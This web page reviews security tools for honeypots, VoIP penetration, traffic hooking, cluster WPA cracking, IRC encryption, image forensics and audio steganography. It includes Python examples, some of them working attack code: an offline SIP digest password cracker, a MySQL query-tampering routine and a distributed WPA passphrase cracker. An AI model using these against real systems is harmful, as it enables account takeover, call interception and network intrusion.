Category: Other

Other computing tips

  • The Active Defense Harbinger Distribution

    The Active Defense Harbinger Distribution (ADHD) is a security Linux distribution based on Ubuntu 12.04 Long Term Support. Ubuntu LTS releases receive five years of support from Canonical, Ubuntu's developer, which makes them a good fit for enterprises and for anyone who does not need cutting-edge software and prefers a stable operating system that keeps receiving security patches for years without being upgraded to the next release.

    ADHD presents itself as an active defence distribution with preconfigured strike-back tools, able to interfere with an attacker's fingerprinting of your systems, the reconnaissance stage that precedes an attack. Just like Ubuntu, you can run ADHD from a live DVD or install it on your computer. On first boot you are given the choice of logging in as the adhd user or the guest user; the login password is adhd. The default desktop is the lightweight Xfce, which you can swap for another using Synaptic, a graphical front end to the APT package manager that Debian and Ubuntu use to install, remove and upgrade software packages.

    The Active Defense Harbinger Distribution (ADHD)

    On the surface you will not notice many differences between ADHD and any other end-user Linux distribution: it ships with The Gimp and gThumb for image editing, the full LibreOffice suite, Thunderbird and Firefox, Catfish for file search, basic network tools to ping, traceroute, port scan, finger and whois an IP address, XChat for IRC, the Zenmap front end to the Nmap scanner, Gigolo (a front end for mounting remote file systems), the Parole media player, gmusicbrowser and Gwibber, an open source microblogging client for popular social networks such as Twitter and Flickr. The geekiest tool on the menu is pgAdmin, for editing PostgreSQL databases; apart from Zenmap you will not find hacking or penetration testing software on the list.

    ADHD protects you by deploying honeypots that waste an attacker's time, alert the administrator while the intrusion is still harmless and gather information about where the attack is coming from.

    One of ADHD's main defences is Nova, the Network Obfuscation and Virtualized Anti-Reconnaissance tool. It does not rely on signature-based malware detection; instead it creates decoy systems for the attacker to interact with and alerts the system administrator by email or log entry when someone touches a dummy folder, port or similar. ADHD can also serve endlessly recursive directories so that the attacker never reaches a real target, or Nova can be told to shut a port down automatically as soon as someone touches it.
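    The recursive-directory decoy and the alert-on-touch behaviour described above can be reproduced in a few lines. The following is an added example written for this page, not code from ADHD or Nova: a WSGI application that answers every request with a fake "Index of" listing whose links only lead deeper, plus a hit counter that raises an alert once one source address has walked a few of those pages. The fan-out, the alert threshold and the 203.0.113.x test address are assumptions.

```python
import hashlib
import html
from collections import defaultdict


class Tracker:
    """Counts labyrinth hits per source IP and alerts once a threshold is crossed."""

    def __init__(self, threshold=3, alert=print):
        self.hits = defaultdict(int)
        self.threshold = threshold   # assumed: three decoy pages is already suspicious
        self.alert = alert
        self.alerted = set()

    def record(self, ip, path):
        self.hits[ip] += 1
        if self.hits[ip] >= self.threshold and ip not in self.alerted:
            self.alerted.add(ip)
            self.alert("decoy walker: %s requested %d labyrinth pages, last %s"
                       % (ip, self.hits[ip], path))
            return True
        return False


def labyrinth_links(path, fanout=4):
    """Deterministic child directories for a path: every page always has deeper links,
    and the same URL always shows the same listing, so it looks like a real tree."""
    links = []
    for i in range(fanout):
        name = hashlib.sha256(("%s/%d" % (path, i)).encode()).hexdigest()[:8]
        links.append(path.rstrip("/") + "/" + name + "/")
    return links


def labyrinth_page(path):
    """A fake directory index whose entries are all deeper labyrinth directories."""
    title = html.escape("Index of " + path)
    items = []
    for link in labyrinth_links(path):
        name = link.rsplit("/", 2)[1]
        items.append('<li><a href="%s">%s/</a></li>' % (html.escape(link), html.escape(name)))
    return ("<html><head><title>%s</title></head><body><h1>%s</h1><ul>"
            '<li><a href="../">Parent Directory</a></li>%s</ul></body></html>'
            % (title, title, "".join(items)))


def make_app(tracker):
    """WSGI app: log the hit, then serve another layer of the labyrinth."""
    def app(environ, start_response):
        path = environ.get("PATH_INFO", "/") or "/"
        ip = environ.get("REMOTE_ADDR", "?")
        tracker.record(ip, path)
        body = labyrinth_page(path).encode("utf-8")
        start_response("200 OK", [("Content-Type", "text/html; charset=utf-8"),
                                  ("Content-Length", str(len(body)))])
        return [body]
    return app


if __name__ == "__main__":
    from wsgiref.simple_server import make_server
    # Serve the decoy on an unused port; point a real vhost or a "hidden" path at it.
    make_server("127.0.0.1", 8080, make_app(Tracker())).serve_forever()
```

    A crawler or a scanner's directory brute-forcer keeps finding new "directories" indefinitely, and the alert fires long before anything real is touched; in production you would hang this off a path no legitimate user visits and send the alert to your logging pipeline instead of stdout.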

    The Active Defense Harbinger Distribution system monitor

    ADHD also comes with HoneyBadger, which can create a web page that looks like a Cisco administration interface, or anything else an attacker would want to reach. The dummy page runs a Java applet on the attacker's machine, collects the IP address and adds it to a report page that uses the Google Maps API to plot the approximate geographic location of that address.

    The best thing about ADHD is that you should not notice it is there until something happens. On the minus side there are no offensive tools beyond those that gather information about the attacker, although you can add more aggressive tools with the package manager.

    Visit ADHD homepage

  • Penetrate Voice over IP servers with Viproy

    Viproy is a tool for testing the security of SIP servers. The Session Initiation Protocol is widely used to set up voice and video calls over IP. The software is made up of modules, each performing a specific task, and all of them support debugging and verbose modes. It is a Linux-only command line tool; instructions are included and a Linux beginner should have no difficulty following them.

    The modules are options, register, invite, enumerator, brute force, trust analyzer and SIP proxy, and you can set target networks and port numbers for each. Before carrying out any attack you should fingerprint and enumerate the SIP services first; after that you can register with the server and start intercepting calls, placing your own or creating havoc at will.

    Viproy's VoIP penetration tests include targeting a local client address and port, discovering SIP services with valid credentials, setting a username and password on an Asterisk PBX, sending direct INVITEs and spoofing calls without credentials, enumerating all users, launching a denial of service against every valid user so that nobody can take calls, and brute forcing a target account or numeric range with a dictionary to test the strength of users' passwords.
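    To make the fingerprint, register and brute-force steps concrete, here is an added example (written for this page, not Viproy's own code) that builds a REGISTER, reads the realm and nonce out of the server's 401 challenge, computes the MD5 digest response the way Asterisk expects it, and then runs an offline dictionary check against a captured authenticated REGISTER, which is what the brute force module effectively does over the network. The 401 challenge, the pbx.example domain, extension 1001 and the password are constructed sample data.

```python
import hashlib
import re


def _md5(s):
    return hashlib.md5(s.encode()).hexdigest()


def parse_sip(raw):
    """Split a SIP message into (start line, {lower-cased header: value}, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    start, *header_lines = head.split("\r\n")
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return start, headers, body


def parse_auth_params(value):
    """'Digest realm="asterisk", nonce="1a2b", algorithm=MD5' -> dict of parameters."""
    _scheme, _, params = value.partition(" ")
    out = {}
    for key, quoted, bare in re.findall(r'(\w+)=(?:"([^"]*)"|([^,\s]+))', params):
        out[key] = quoted or bare
    return out


def fingerprint(raw_response):
    """Software advertised in a reply: the Server header, else User-Agent."""
    _, headers, _ = parse_sip(raw_response)
    return headers.get("server") or headers.get("user-agent") or "unknown"


def digest_response(user, realm, password, method, uri, nonce):
    """MD5 digest without qop, the form Asterisk and most PBXs accept for REGISTER."""
    ha1 = _md5("%s:%s:%s" % (user, realm, password))
    ha2 = _md5("%s:%s" % (method, uri))
    return _md5("%s:%s:%s" % (ha1, nonce, ha2))


def build_register(user, domain, call_id, cseq, authorization=None):
    lines = [
        "REGISTER sip:%s SIP/2.0" % domain,
        "Via: SIP/2.0/UDP 192.0.2.10:5060;branch=z9hG4bK-%s-%d" % (call_id, cseq),
        "From: <sip:%s@%s>;tag=t%s" % (user, domain, call_id),
        "To: <sip:%s@%s>" % (user, domain),
        "Call-ID: %s@192.0.2.10" % call_id,
        "CSeq: %d REGISTER" % cseq,
        "Contact: <sip:%s@192.0.2.10:5060>" % user,
        "User-Agent: sip-probe-example/0.1",
    ]
    if authorization:
        lines.append("Authorization: " + authorization)
    lines.append("Content-Length: 0")
    return "\r\n".join(lines) + "\r\n\r\n"


def answer_challenge(challenge, user, domain, password, call_id="1"):
    """Second REGISTER: compute the digest for the realm/nonce in the 401 and resend."""
    _, headers, _ = parse_sip(challenge)
    chal = parse_auth_params(headers["www-authenticate"])
    uri = "sip:%s" % domain
    resp = digest_response(user, chal["realm"], password, "REGISTER", uri, chal["nonce"])
    auth = ('Digest username="%s", realm="%s", nonce="%s", uri="%s", response="%s", algorithm=MD5'
            % (user, chal["realm"], chal["nonce"], uri, resp))
    return build_register(user, domain, call_id, 2, auth)


def crack_register(raw_register, wordlist):
    """Offline dictionary attack on a captured authenticated REGISTER: everything
    except the password is in the Authorization header, so each guess is one MD5 chain."""
    start, headers, _ = parse_sip(raw_register)
    method = start.split()[0]
    p = parse_auth_params(headers["authorization"])
    for candidate in wordlist:
        if digest_response(p["username"], p["realm"], candidate,
                           method, p["uri"], p["nonce"]) == p["response"]:
            return candidate
    return None


# Constructed 401, in the shape an Asterisk server sends to an unauthenticated REGISTER.
CHALLENGE_401 = (
    "SIP/2.0 401 Unauthorized\r\n"
    "Via: SIP/2.0/UDP 192.0.2.10:5060;branch=z9hG4bK-1-1;received=192.0.2.10\r\n"
    "From: <sip:1001@pbx.example>;tag=t1\r\n"
    "To: <sip:1001@pbx.example>;tag=as5f3e2a1c\r\n"
    "Call-ID: 1@192.0.2.10\r\n"
    "CSeq: 1 REGISTER\r\n"
    "Server: Asterisk PBX 1.8.10.1\r\n"
    'WWW-Authenticate: Digest algorithm=MD5, realm="asterisk", nonce="1a2b3c4d"\r\n'
    "Content-Length: 0\r\n\r\n"
)
```

    The Server header is the fingerprint you want before choosing modules, and the digest is why a sniffed registration is as good as an online brute force: the nonce and realm are in the captured header, so guessing can proceed offline at disk speed.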

    Viproy VoIP penetration testing and hacking tool

    The Viproy homepage lists a vulnerable VoIP server on which you can evaluate your hacking skills without harming anybody. In a real-life scenario, after successfully compromising a VoIP server you can listen in on or record inbound and outbound calls and set up your own usernames and passwords. How much damage can be done depends on how many vulnerabilities exist, and not every module will necessarily succeed against a given server.

    Another tool you may want to add to your VoIP hacking arsenal is the SIPVicious suite, which you can use to audit VoIP systems, scanning an IP range for SIP devices and cracking SIP PBX passwords. A VPN protects VoIP calls in transit, but the endpoints at either end remain exposed: an encrypted VoIP call can still be listened to by compromising a server before encryption takes place or where the call is decrypted at the far end.

    Visit Viproy homepage

  • Intercept communications with data tampering tool HookME

    HookME is a free, open source Windows tool that intercepts network communications by hooking into chosen processes and API calls. Because the hook sits inside the process, it sees SSL traffic in the clear: data is captured before it is encrypted on the way out and after it is decrypted on the way in.

    The initial download is tiny (125KB). When you try to install it you get a message saying it needs supplemental .dll and .db files; over 30MB of files are then downloaded automatically by HookME from a third-party site, and you are asked to register the new .dll dependencies, which means granting administrative rights to the Windows Command Processor. This installation process could make some people uneasy about the tool carrying malware; the only reassurance is that HookME is developed by the well-known creators of the OSINT tool FOCA.

    Every time you start the software you are shown a small Nektra Deviare unregistered-licence splash screen (Deviare is the hooking engine HookME is built on). You do not have to buy a licence, but doing so gets rid of the splash screen.

    TCP data tampering tool HookME

    The software has a tabbed user interface from which you can intercept any hooked API call and read the data being sent and received; intercepted packets can be changed in real time, dropped or forwarded. A Python plugin system lets anyone write a custom add-on, and a few templates are provided. At the BlackHat Europe 2013 conference HookME's developer showed how easily MySQL traffic can be intercepted and a backdoor injected on the fly, executing remote commands with a few clicks.

    Real-time intercepted data is shown in the interface's hex editor, with the hexadecimal bytes alongside their text rendering; you can highlight a packet and click the "Drop" or "Forward" buttons. A small window at the bottom of the program tells you which process is hooked, for example firefox.exe if you are eavesdropping on a Firefox browser session.
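    The drop/forward/modify decisions and the MySQL demo above come down to one detail that a raw hex edit gets wrong: after changing a query you must re-frame the packet, because MySQL prefixes every packet with a 3-byte length. As an added illustration (not HookME's own code, which hooks send/recv inside the Windows process rather than parsing a captured stream), the following splits a MySQL client stream into packets, applies a tampering rule to each COM_QUERY and re-encodes the header so the server still parses everything that follows. The sample stream and the demo rule are constructed.

```python
COM_QUERY = 0x03   # first payload byte of a text query packet


def split_packets(stream):
    """Split a MySQL client byte stream into (sequence id, payload) packets.
    Wire format: 3-byte little-endian payload length, 1-byte sequence id, payload.
    Returns the complete packets and any trailing incomplete bytes."""
    packets, pos = [], 0
    while pos + 4 <= len(stream):
        length = int.from_bytes(stream[pos:pos + 3], "little")
        seq = stream[pos + 3]
        payload = stream[pos + 4:pos + 4 + length]
        if len(payload) < length:
            break                      # partial packet: wait for more bytes
        packets.append((seq, payload))
        pos += 4 + length
    return packets, stream[pos:]


def encode_packet(seq, payload):
    """Re-frame a payload with a correct length header."""
    return len(payload).to_bytes(3, "little") + bytes([seq]) + payload


def query_text(payload):
    """The SQL of a COM_QUERY packet, or None for any other command (ping, quit, ...)."""
    if payload and payload[0] == COM_QUERY:
        return payload[1:].decode("utf-8", "replace")
    return None


def tamper_stream(stream, rule):
    """Apply rule(sql) -> ("forward" | "drop" | "modify", new_sql) to each query packet.
    Returns the bytes to pass on to the server and an audit log of the decisions."""
    packets, rest = split_packets(stream)
    out, log = bytearray(), []
    for seq, payload in packets:
        sql = query_text(payload)
        if sql is None:                # non-query commands are passed through untouched
            out += encode_packet(seq, payload)
            log.append(("forward", None))
            continue
        action, new_sql = rule(sql)
        if action == "drop":
            log.append(("drop", sql))
            continue
        if action == "modify":
            payload = bytes([COM_QUERY]) + new_sql.encode("utf-8")
            sql = new_sql
        out += encode_packet(seq, payload)   # length recomputed for the new payload
        log.append((action, sql))
    return bytes(out) + rest, log


def demo_rule(sql):
    """Constructed policy: block schema changes, widen one lookup, pass the rest."""
    upper = sql.strip().upper()
    if upper.startswith(("DROP", "ALTER")):
        return "drop", None
    if "WHERE id = 5" in sql:
        return "modify", sql.replace("WHERE id = 5", "WHERE 1 = 1")
    return "forward", None


def mysql_query_packet(sql, seq=0):
    return encode_packet(seq, bytes([COM_QUERY]) + sql.encode("utf-8"))


# Constructed client stream: a lookup, a ping (COM_PING = 0x0e), a statement to drop, a trivial query.
SAMPLE_STREAM = (
    mysql_query_packet("SELECT name FROM users WHERE id = 5")
    + encode_packet(0, b"\x0e")
    + mysql_query_packet("DROP TABLE audit")
    + mysql_query_packet("SELECT 1")
)
```

    Dropping a query packet leaves the client waiting for a reply it will never get; a tool that does this in a live session has to synthesize an OK or error packet in the other direction as well, which is the part a plugin would add.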

    The tool can be used in penetration testing, for building malware and backdoors at the network protocol level, or for uncovering rootkits that hook API calls. The main obstacle for an attacker wanting to use HookME against you is that it runs inside the target process, so they would first have to get it running on your machine.

    Visit HookME homepage

  • Moscrack wireless WPA cracking with cluster computers

    The Multifarious On-demand Systems Cracker (Moscrack) is a Perl application built on Aircrack-ng to crack wireless WPA keys with a cluster of computers. It can be deployed on MOSIX, a cluster management system that spreads processes across multiple Linux machines to pool their processors, or run across a set of SSH nodes. Clusters can be built from any Unix-like operating system, including the iPhone, Mac OS X, or Windows with Cygwin, and it has also been tested with an Android phone acting as an SSH node. Best of all, you can run Moscrack cheaply on the Amazon EC2 cloud computing platform.

    The program splits a word list into chunks and processes them in parallel across all the nodes. If you do not have access to a cluster you can use Moscrack with CUDA, NVIDIA's parallel computing platform implemented in its graphics cards; you will need to install aircrack-ng-cuda and adjust moscrack.conf, the configuration file, accordingly.
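    What each node actually does with its chunk is the WPA passphrase-to-PSK derivation: PBKDF2-HMAC-SHA1 over the SSID for 4096 rounds, which costs the same for every guess and shares nothing between guesses, so the job parallelizes almost perfectly. The following is an added example (not Moscrack's code) showing that derivation, the chunking of a word list across nodes and a thread pool standing in for the cluster. The word list is constructed; the "IEEE"/"password" pair is the reference vector from the 802.11 standard.

```python
import hashlib
from concurrent.futures import ThreadPoolExecutor


def wpa_psk(ssid, passphrase):
    """WPA/WPA2 pre-shared key (the PMK): PBKDF2-HMAC-SHA1, 4096 rounds, 256 bits,
    salted with the SSID, so a word list must be re-hashed for every network name."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"),
                               ssid.encode("utf-8"), 4096, 32)


def chunk_wordlist(words, n_nodes):
    """Split a word list into n_nodes contiguous, near-equal chunks, one per node."""
    size, extra = divmod(len(words), n_nodes)
    chunks, start = [], 0
    for i in range(n_nodes):
        end = start + size + (1 if i < extra else 0)
        chunks.append(words[start:end])
        start = end
    return chunks


def crack_chunk(ssid, target_pmk, chunk):
    """What one node does with its share: derive and compare, word by word."""
    for word in chunk:
        if wpa_psk(ssid, word) == target_pmk:
            return word
    return None


def crack_distributed(ssid, target_pmk, words, n_nodes=4):
    """Dispatch chunks to workers (threads here; SSH or MOSIX nodes in a real cluster)."""
    chunks = chunk_wordlist(words, n_nodes)
    with ThreadPoolExecutor(max_workers=n_nodes) as pool:
        for found in pool.map(lambda c: crack_chunk(ssid, target_pmk, c), chunks):
            if found is not None:
                return found
    return None


# Constructed word list and target, assumed for the demo.
WORDS = ["letmein", "qwerty", "123456", "password", "dragon", "iloveyou", "monkey"]
TARGET = wpa_psk("IEEE", "password")
```

    A real run does not have the PMK to compare against: the nodes check each candidate PMK against the MIC of a captured four-way handshake, which is what aircrack-ng does underneath Moscrack. The comparison here is simplified to the derived key so the block stands alone; the cost per guess, and therefore the benefit of splitting the list, is the same.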

    Moscrack cloud wireless WPA cracking

    Moscrack's command line interface shows the word list progress as a percentage, the estimated completion time, running time, server status, cluster speed and other very complete verbose data. A GUI is optional but pretty basic, so it is better to get comfortable with the command line version, which also helps you understand how the pieces fit together.

    The program is designed to run for weeks or months: you can leave it on and forget about it until the job is done. Its functions go beyond WPA cracking; adding the Dehasher plugin lets it crack SHA256/512, DES, MD5 and Blowfish hashes by comparison. If you would rather not install the tool on your computer, a Moscrack live CD based on SUSE Linux is available for download.

    Visit Moscrack homepage

  • Internet Relay Chat encryption with Dirt

    Dirt is an open source project that adds FiSH-compatible chat encryption to any IRC client; it works as a SOCKS4 proxy or as a bouncer. Dirt only accepts connections from localhost (127.0.0.1), to make sure that unencrypted text never leaves your machine: the SOCKS4 listener is on port 1088 and port 6666 is used when acting as a bouncer. Settings can be changed by editing "dirt.ini" with a text editor.

    After installation a Dirt icon appears in your system tray. To use Dirt with mIRC, a popular Windows IRC client, go to Tools > Options > Connect > Firewall and enter the hostname (127.0.0.1) and port number. Once connected, type /dirt to see a list of all available commands.

    mIRC dirt encryption IRC chat

    For those not aware, FiSH is a widely available IRC plugin that provides Blowfish encryption for IRC chat; it exists for the irssi command line client on Linux and many others. Bear in mind that classic FiSH encrypts each message with Blowfish in ECB mode under a shared channel key, so identical plaintext blocks give identical ciphertext: it hides the conversation from the IRC server and casual observers, not from anyone who obtains the key. If you use a Mac or Debian Linux you could try FiSHLiM, a FiSH-compatible plugin for the XChat and HexChat IRC clients.

    Dirt works on Windows, Linux and BSD but is still in development. An alternative is psyBNC, an IRC bouncer that replaces your computer's IP address with a virtual host (vHost) and supports channel encryption with the Blowfish and IDEA algorithms. You will need a shell account to run psyBNC; many companies offer them at cut-price with easy configuration instructions, and they are normally used by channel administrators to deal with abuse.

    Visit Dirt IRC encryption homepage

  • Free online image forensic analysis at Fotoforensics

    Fotoforensics is a website for advanced photo analysis: you can check whether a photo has been modified and view embedded metadata that may contain private details. Photos can be uploaded from your PC or linked directly from a URL, and an optional Firefox browser plugin makes image forensic analysis easier; any image your browser can display can be analysed, and the plugin gets around sites like Facebook that require a login to view a photograph.

    The service supports JPEG and PNG, the most common image formats on the Internet. Metadata analysis can reveal whether a graphics editor was used to modify the image (ACDSee, for example, embeds its program name in the photos it saves), and metadata may also show how many times the image has been edited, identity attributes and how the image was managed.

    Image computer forensics Fotoforensics

    To determine whether a photograph has been forged, Fotoforensics uses Error Level Analysis (ELA): the image is re-saved at a known JPEG compression level and compared with the original, so regions that sit at a different error level from the rest stand out as likely edits. This is not a 100% accurate way of detecting fake photos; it is possible to defeat forensic algorithms that look at high-frequency detail by reducing colour, brightness or contrast, but other photo attributes can still be analysed.

    The website has a very detailed tutorial and FAQ explaining what results to expect and how to interpret them, and you should read it to understand what you are seeing: this is not a tool that gives a "Yes" or "No" answer, it is up to you to interpret the results, which may turn out to be inconclusive.

    You could use this tool to check that your EXIF cleaner is working properly, but do not upload anything private because the results are saved at a public URL on the server. Uploading pornography is not allowed; to check whether an X-rated celebrity photo is real you will need to find another site, or they will ban your IP address.
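    The metadata check described earlier (which editor saved the file) and the "is my EXIF cleaner working" test can both be done locally, without uploading anything to a public URL. The following added example (not Fotoforensics code) walks the JPEG marker segments, reads the ASCII tags such as Software out of the Exif APP1 segment, and strips APP1 so the result can be re-checked. The sample JPEG is constructed inside the block and is only a marker shell, not a viewable picture.

```python
import struct

APP1, SOS = 0xFFE1, 0xFFDA
TAG_NAMES = {0x010F: "Make", 0x0110: "Model", 0x0131: "Software", 0x0132: "DateTime"}


def iter_segments(jpeg):
    """Yield (marker, payload) for each JPEG marker segment up to Start Of Scan."""
    if jpeg[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG file")
    pos = 2
    while pos + 4 <= len(jpeg):
        marker, length = struct.unpack(">HH", jpeg[pos:pos + 4])
        yield marker, jpeg[pos + 4:pos + 2 + length]   # length counts its own two bytes
        if marker == SOS:
            return
        pos += 2 + length


def parse_exif_ascii(app1):
    """ASCII tags of IFD0 in an Exif APP1 payload (Software, Make, Model, DateTime)."""
    if not app1.startswith(b"Exif\x00\x00"):
        return {}
    tiff = app1[6:]
    endian = "<" if tiff[:2] == b"II" else ">"     # byte order is declared by the TIFF header
    (ifd,) = struct.unpack(endian + "I", tiff[4:8])
    (count,) = struct.unpack(endian + "H", tiff[ifd:ifd + 2])
    tags = {}
    for i in range(count):
        entry = ifd + 2 + 12 * i
        tag, typ, n, value = struct.unpack(endian + "HHII", tiff[entry:entry + 12])
        if typ != 2:                                 # 2 = ASCII; other types skipped here
            continue
        # Values of four bytes or fewer live inside the entry, longer ones at an offset.
        raw = tiff[entry + 8:entry + 8 + n] if n <= 4 else tiff[value:value + n]
        tags[TAG_NAMES.get(tag, "0x%04x" % tag)] = raw.rstrip(b"\x00").decode("ascii", "replace")
    return tags


def exif_of(jpeg):
    for marker, payload in iter_segments(jpeg):
        if marker == APP1 and payload.startswith(b"Exif"):
            return parse_exif_ascii(payload)
    return {}


def strip_app1(jpeg):
    """Drop every APP1 segment (Exif, XMP); image data from SOS onward is copied untouched."""
    out, pos = bytearray(jpeg[:2]), 2
    while pos + 4 <= len(jpeg):
        marker, length = struct.unpack(">HH", jpeg[pos:pos + 4])
        end = pos + 2 + length
        if marker == SOS:
            out += jpeg[pos:]
            return bytes(out)
        if marker != APP1:
            out += jpeg[pos:end]
        pos = end
    return bytes(out)


def build_sample_jpeg(software):
    """Constructed minimal JPEG shell (not a decodable picture): SOI, an Exif APP1 carrying
    one Software tag, an empty SOS and EOI. Enough to exercise the parser and the cleaner."""
    text = software.encode("ascii") + b"\x00"
    ifd = (struct.pack("<H", 1)                                   # one directory entry
           + struct.pack("<HHII", 0x0131, 2, len(text), 26)       # Software, ASCII, at offset 26
           + struct.pack("<I", 0))                                # no next IFD
    tiff = b"II*\x00" + struct.pack("<I", 8) + ifd + text         # 8-byte header, IFD, string
    app1 = b"Exif\x00\x00" + tiff
    return (b"\xff\xd8" + struct.pack(">HH", APP1, len(app1) + 2) + app1
            + b"\xff\xda\x00\x02" + b"\xff\xd9")
```

    Running exif_of over a photo before and after your cleaner is the local equivalent of the metadata panel on the site; a Software tag that survives the cleaner is the thing to look for.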

    Visit Fotoforensics homepage

  • Hide data inside sound files with DeepSound

    DeepSound is a steganography tool that hides any kind of data, from text to photos, inside sound files. For extra security the data can be encrypted with AES-256 and is then only recoverable with the correct password; the modified audio file plays as normal and nobody should notice it carries hidden data. The interface is very simple, with a file browser for locating a suitable carrier sound file. When password-protecting the data you are not asked to confirm the masked password a second time, so if you make a typo you will not notice until it is too late; it is best to test the file after creating it to make sure everything works as expected.

    Encoding and extracting data can be done quickly with keyboard shortcuts, and the settings let you adjust the output quality ratio from low to high. If you are going to burn an audio CD containing hidden data, the developer advises disabling volume normalization in the CD burning software, since it alters the samples and would corrupt the hidden data beyond recovery. A one-page help manual with screenshots is included; you are unlikely to need it.

    DeepSound hides data inside audio files

    The tool can only hide data inside Waveform Audio File Format (.wav) and Free Lossless Audio Codec (.flac) files. These are not very common formats: .wav is normally uncompressed, perfect for hiding data in, but the files are very large and rarely used for music, only for short sounds.

    FLAC is a royalty-free open source alternative to the proprietary .mp3; .flac files are compressed and suitable for music albums, and they support metadata and album cover art. If you are going to hide data it will probably look less suspicious inside a .flac than in the unusual .wav format, and a .flac file is easier to distribute given its smaller size. The application could also be used to watermark copyrighted music and trace the source if it later turns up leaked on file sharing networks, although converting the file to another audio format would destroy the hidden watermark.
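    To show why uncompressed PCM is the easy carrier, and why volume normalization or a format conversion wipes the hidden data, here is an added example of the simplest embedding scheme: least-significant-bit substitution in 16-bit samples, with a length header so the extractor knows where to stop. It is written for this page and is not DeepSound's code or algorithm; the carrier tone, the payload and the normalization gain are constructed.

```python
import io
import math
import struct
import wave


def make_carrier(seconds=1.0, rate=8000, amplitude=8000):
    """Constructed carrier: one second of a quiet 440 Hz tone as 16-bit mono samples."""
    n = int(seconds * rate)
    return [int(amplitude * math.sin(2 * math.pi * 440 * i / rate)) for i in range(n)]


def samples_to_wav(samples, rate=8000):
    """Write 16-bit mono PCM samples into an in-memory .wav file."""
    buf = io.BytesIO()
    with wave.open(buf, "wb") as w:
        w.setnchannels(1)
        w.setsampwidth(2)
        w.setframerate(rate)
        w.writeframes(struct.pack("<%dh" % len(samples), *samples))
    return buf.getvalue()


def wav_to_samples(data):
    with wave.open(io.BytesIO(data), "rb") as w:
        raw = w.readframes(w.getnframes())
    return list(struct.unpack("<%dh" % (len(raw) // 2), raw))


def _bits(data):
    for byte in data:
        for shift in range(7, -1, -1):
            yield (byte >> shift) & 1


def embed(samples, payload):
    """Store a 4-byte length header plus the payload in the LSB of successive samples."""
    framed = struct.pack(">I", len(payload)) + payload
    if len(framed) * 8 > len(samples):
        raise ValueError("carrier too short for this payload")
    out = list(samples)
    for i, bit in enumerate(_bits(framed)):
        out[i] = (out[i] & ~1) | bit       # each sample moves by at most 1: inaudible
    return out


def extract(samples):
    """Recover the payload, or b"" when the length header is implausible (carrier altered)."""
    def read_int(n_bytes, start):
        value = 0
        for k in range(n_bytes * 8):
            value = (value << 1) | (samples[start + k] & 1)
        return value
    length = read_int(4, 0)
    if length * 8 > len(samples) - 32:
        return b""
    return bytes(read_int(1, 32 + 8 * i) for i in range(length))


def normalize(samples, gain):
    """Stand-in for a burner's or player's volume normalization: rescale every sample.
    Any rescaling rewrites the low bits, which is exactly where the payload lives."""
    return [max(-32768, min(32767, int(s * gain))) for s in samples]
```

    Lossless containers such as .wav and .flac preserve every sample bit, so the round trip through a file works; normalization, resampling or an MP3 encode does not, which is the same reason the watermark idea above dies on format conversion. DeepSound adds AES-256 on top; here the payload is stored in the clear to keep the embedding visible.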

    Visit DeepSound homepage